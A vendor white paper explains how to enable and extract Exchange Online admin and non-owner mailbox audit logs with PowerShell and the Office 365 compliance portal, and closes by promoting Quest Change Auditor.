Because admin auditing is based on the premise that every performed action relates to running a PowerShell cmdlet, the Set-AdminAuditLogConfig cmdlet enables you to specify which cmdlets and cmdlet parameters to include or exclude. Be sure to note that auditing of commands in Exchange Online does not include read-only types of commands, such as any Get and Search commands.


You can specify individual cmdlets or use wildcard characters to denote a group of cmdlets:


Set-AdminAuditLogConfig -AdminAuditLogEnabled $true -AdminAuditLogCmdlets * -AdminAuditLogParameters * -AdminAuditLogExcludedCmdlets *Mailbox*, *TransportRule*


 So, how do you get this information out of Office 365?


There are two ways to extract admin auditing information from Office 365: via PowerShell or by using the Office 365 Security & Compliance portal.

Auditing via PowerShell

Using PowerShell to audit can be accomplished by using the Search-AdminAuditLog cmdlet. When you use this cmdlet with no filtering parameters, you obtain the last 1000 entries. This information shows the cmdlets and parameters that were used, who ran each action, whether the action was successful, the object affected, and more, as shown in the following figure.

The Search-AdminAuditLog cmdlet results don’t provide comprehensive detail; for example, the Caller field, which specifies which users called the cmdlet, is blank. So the cmdlet is more useful if you’re trying to get an overview of changes made rather than performing an actual audit.

You can alternatively use the New-AdminAuditLogSearch cmdlet to receive an emailed XML report of the log entries within a specified date range. For example, in the following figure, you can see that an admin is adding full mailbox permissions to the user bbrooks.
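A sketch of requesting such an emailed report (the search name, 30-day window, and recipient address are placeholders):

```powershell
# Sketch: email an XML report of admin audit entries for the last 30 days.
New-AdminAuditLogSearch -Name "Monthly admin audit" `
    -StartDate (Get-Date).AddDays(-30) -EndDate (Get-Date) `
    -StatusMailRecipients "auditor@example.com"
```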


Quest Insight – Filtering Cmdlet Searches

The basic cmdlets return a large amount of data that might include the behind-the-scenes management actions performed by Microsoft. So it’s important to use the cmdlet’s parameters to filter the noise of all the resulting data.


Both the Search-AdminAuditLog and New-AdminAuditLogSearch cmdlets enable you to filter by date, cmdlet used, parameters used, the user who performed the action, whether that user is external to the organization, and the objects that the action affected.


By using some of these filters, you can hone down the results to a more pertinent set of data, increasing your productivity by more quickly finding the answers you need. 
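For instance (the cmdlet name and 14-day window below are illustrative), a filtered search for mailbox permission grants might look like:

```powershell
# Sketch: find who granted mailbox permissions in the last 14 days.
Search-AdminAuditLog -Cmdlets Add-MailboxPermission `
    -StartDate (Get-Date).AddDays(-14) -EndDate (Get-Date) |
    Select-Object RunDate, Caller, ObjectModified, Succeeded
```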

Auditing via the Office 365 Security & Compliance Portal

Those who simply aren’t “PowerShell people” and would rather use a management console can take advantage of the Audit Log Search functionality in the Office 365 Security & Compliance Portal. In the pre-created Activities, you can begin your audit by simply selecting a management action, such as the delegation of mailbox permissions in the following figure. You can use the additional filter fields to further refine the results to the few that meet your criteria.

Be aware that the Activities are a double-edged sword. You are limited to those activities (with the supported filters) and cannot generate custom search scenarios of your own. For example, you can’t search for every time someone exported a mailbox (at the time of this writing).

Results can be exported as well, for reporting and further analysis.

You will experience a few limitations should you choose to use the console. First, you’re limited to only 90 days of audit data — and there’s no way around that. In addition, although audit data is available to PowerShell cmdlets within 30 minutes, accessing the same data via the console can take up to 24 hours.

Auditing Non-Owner Mailbox Access

Auditing administrative actions helps to identify the events leading up to inappropriate activity within Exchange. But the real value is found in auditing access to the data that is stored within Exchange. The assumption with non-owner mailbox auditing is that the mailbox owner is using the mailbox appropriately. (Sure, cases of insider misuse by a mailbox owner exist, but those issues are addressed by message tracking.) So, the focus shifts to any non-owners that access a given mailbox.

In general, you should be concerned any time a non-owner views, sends email on behalf of, or deletes email in another user’s mailbox. Delegates — a part of Exchange for as long as the product has been available — are a vital part of the productivity of many users who require assistance from other employees. But because delegate access exists, and because inappropriate delegate access can be granted, auditing non-owner access to mailboxes provides an important piece of data. 

Quest Insight – Which Mailboxes Should You Audit?

Which mailboxes to audit is a valid question. Find the answer by considering these questions:


  • Is there any delegate access? If so, turn on auditing. This way, you have an audit trail of every time the delegate accesses the owner's mailbox and what was done.

  • Does the mailbox contain sensitive data? Mailboxes that are owned by users who regularly send and receive financials, intellectual property, legal documents, and so on might be prime targets for insider activity. Even when no delegates are assigned to a mailbox that contains sensitive data, enable auditing proactively so that you have an audit trail of any and all access to the mailbox.


Unlike admin auditing, which is an organizational-wide audit setting, non-owner mailbox auditing is enabled on a per-mailbox basis. Audit log entries are retained, by default, for 90 days—a value that can be customized.
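To see which mailboxes already have per-mailbox auditing turned on and what their retention is (a sketch; run in a connected Exchange Online session):

```powershell
# Sketch: list mailboxes with non-owner auditing enabled and their settings.
Get-Mailbox -ResultSize Unlimited |
    Where-Object { $_.AuditEnabled } |
    Select-Object DisplayName, AuditEnabled, AuditLogAgeLimit, AuditDelegate, AuditAdmin
```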

You can enable non-owner mailbox auditing at three levels, each with specific audited actions:

  • Admin. This level audits actions by admins who have not been granted delegate permissions to a mailbox.
  • Delegate. Anyone who is assigned permissions or given Send on Behalf of permissions is considered a delegate.
  • Owner. Auditing for the mailbox owner is typically disabled, as it isn’t relevant to audits. In addition, enabling owner auditing generates a great deal of information. Non-owner access is generally infrequent and limited in scope (e.g., an assistant sending out calendar invites for their boss, someone in IT finding a specific message), whereas audits of owner access encompass every email created, read, filed, deleted, and so on.

Enabling Non-Owner Mailbox Auditing

Like admin auditing, non-owner mailbox auditing is enabled by using PowerShell via the Set-Mailbox cmdlet. As previously mentioned, this action is accomplished on a per-mailbox basis and requires that you specify which level or levels of auditing (admin, delegate, or owner) you want to enable:


Set-Mailbox -Identity "John Smith" -AuditDelegate SendOnBehalf,FolderBind -AuditEnabled $true


Note the AuditDelegate parameter in this command. It enables mailbox auditing, but only for delegate access and only for the specified actions. You either need to run the cmdlet a second time to configure auditing of administrator access, specifying which actions should be audited (as shown in the following command), or include the AuditAdmin parameter in the same execution of the cmdlet:


Set-Mailbox -Identity "John Smith" -AuditAdmin Copy,MessageBind -AuditEnabled $true


Organizations that audit the mailbox access of every user must also enable mailbox auditing for new users. This approach might require a bit more PowerShell scripting, to continuously search for user accounts with a recent creation date and run the previous commands against them.
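One way to sketch that recurring task (the seven-day window and the audited delegate actions are assumptions to adapt to your own policy):

```powershell
# Sketch: enable delegate auditing on mailboxes created in the last 7 days
# that don't already have auditing turned on.
$cutoff = (Get-Date).AddDays(-7)

Get-Mailbox -ResultSize Unlimited |
    Where-Object { $_.WhenCreated -gt $cutoff -and -not $_.AuditEnabled } |
    ForEach-Object {
        Set-Mailbox -Identity $_.Identity `
            -AuditDelegate SendOnBehalf, FolderBind `
            -AuditEnabled $true
    }
```

Scheduling this to run daily (for example, as a scheduled task) closes the gap between mailbox creation and audit coverage.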

Quest Insight – Which Actions Should You Audit?

You should enable both admin and delegate access to help ensure that any (and every) instance of non-owner access is recorded. Auditing of most of the previously mentioned admin actions is automatic whenever auditing is enabled for a given mailbox, with the exception of MessageBind (which for all intents and purposes can be considered a reading of a message) and Copy. Auditing of these actions needs to be enabled separately (as explained earlier). Also note that whenever an admin is assigned Full Access to a mailbox, that admin is considered a delegate user and is audited as such.


As with admin access, some delegate actions (i.e., Create, HardDelete, SendAs, SoftDelete, and Update) are automatically audited. Therefore, you need to enable auditing for any other actions that you want to log.


Some organizations use solutions that scan mailboxes for compliance, identification of sensitive data, categorization for legal purposes, and so on. Such solutions might trigger bogus events because of their access to a given mailbox. In such situations, you can use the Set-MailboxAuditBypassAssociation cmdlet to bypass auditing for a specific, trusted account.
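A sketch of bypassing audit for a trusted scanning account (the account name is a placeholder):

```powershell
# Sketch: stop a trusted compliance-scanner account from generating
# non-owner audit entries on the mailboxes it touches.
Set-MailboxAuditBypassAssociation -Identity "svc-compliance-scan" -AuditBypassEnabled $true

# Verify the bypass is in place
Get-MailboxAuditBypassAssociation -Identity "svc-compliance-scan" |
    Select-Object Name, AuditBypassEnabled
```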

Now that you have enabled mailbox auditing, how do you get your audit logs out?

This process is a bit complicated, as it depends on how many mailboxes you need to audit, how much detail you want to obtain, and whether you need the raw audit data or a report format. You have a few options:

  • Synchronously via PowerShell. You can use the Search-MailboxAuditLog cmdlet to search a single mailbox's audit log entries. The cmdlet displays search results in the Exchange Management Shell window and provides limited detail that might not meet your auditing requirements.
  • Asynchronously via PowerShell. You can use the New-MailboxAuditLogSearch cmdlet to search through the audit logs of one or more mailboxes, with the results sent to a specified email address as an XML file. If you want to pull audit data into your SIEM solution, use this option. Should your cmdlet query criteria generate too many results, the received email simply informs you that the query failed; you'll need to narrow the query to a smaller data set, potentially requiring the combination of multiple XML files to represent a complete audit of all actions. Be aware that Exchange 2016 allows only 10 searches of this type per mailbox within a 24-hour period.
  • Exchange admin center reports. From within the Exchange admin center's reports section (not the Office 365 Security & Compliance portal), you can run a "Search for mailboxes accessed by non-owners" report. However, you cannot export this data.
  • Office 365 Management Activity API. Microsoft provides a RESTful API to access audit data. The API requires significant development effort, so it might not be an option for most organizations. However, it is the only viable option for getting all your audit data out of the cloud and into a compliance-ready, secure archival and monitoring platform. To be compliant, you have to use this API.
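A sketch of the synchronous option (the mailbox name and 30-day window are placeholders):

```powershell
# Sketch: show delegate and admin access to one mailbox over the last month.
Search-MailboxAuditLog -Identity "John Smith" `
    -LogonTypes Delegate, Admin -ShowDetails `
    -StartDate (Get-Date).AddDays(-30) -EndDate (Get-Date) |
    Select-Object LastAccessed, LogonUserDisplayName, Operation, OperationResult
```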

It can take up to 24 hours for events to show up in the unified audit log where they are stored, so you should expect some latency around audit requests. Also note that none of these options makes it truly easy to obtain the information you need: some don't provide the necessary granularity, and others require significant effort to extract it. Think of each option more as another tool to access raw data than as an auditing solution designed to provide you with correlated, formatted intelligence about performed actions.

Meeting Compliance and Security Requirements

The good news is that Office 365 does capture the audit data you need. But compliance and security require more than just capturing audit data. You have to protect, archive, and most importantly monitor that audit data. And monitoring means correlating it with other security information from your environment so that you can actually detect attacks and misuse.

So the bad news is that there is no way you can meet enterprise compliance and security requirements with the out-of-box functionality of Office 365. You must either write your own application against the Management Activity API or adopt a solution that does it for you.

Enter Quest Change Auditor. Change Auditor now integrates audit logs from Exchange Online with the rest of the activity Change Auditor collects, normalizes, and monitors from all over your network. The latest version of Change Auditor implements the Management Activity API and other APIs from Office 365 to automatically collect Exchange Online mailbox and administrator audit logs. Change Auditor brings to Exchange Online the same Who, What, When, and Where capability Change Auditor is famous for. And the cool thing is that you can now see what a given user like Bob is doing both in the cloud and on your internal network, because Change Auditor already monitors:

  • Active Directory
  • SharePoint
  • Windows
  • SQL Server
  • Network Attached Storage
  • Lync
  • VMware

You can’t be compliance without monitoring your environment and that fact doesn’t go away when you move to the cloud. Office 365 captures the activity required by enterprises for compliance but it’s up to you after that. Change Auditor solves this issue and puts cloud activity and on-prem events on the same pane of glass.


About Randy Franklin Smith

Randy Franklin Smith is an internationally recognized expert on the security and control of Windows and Active Directory. Randy wrote The Windows Server 2008 Security Log Revealed—the only book devoted to the Windows security log. Randy is the creator of LOGbinder software, which makes cryptic application logs understandable and available to log-management and SIEM solutions. As a Certified Information Systems Auditor, Randy performs security reviews for clients ranging from small, privately held firms to Fortune 500 companies and national and international organizations. Randy is also a Microsoft Security Most Valuable Professional.


Monterey Technology Group, Inc. and Dell Software make no claim that use of this white paper will assure a successful outcome. Readers use all information within this document at their own risk.

[1] Osterman Research, 2015
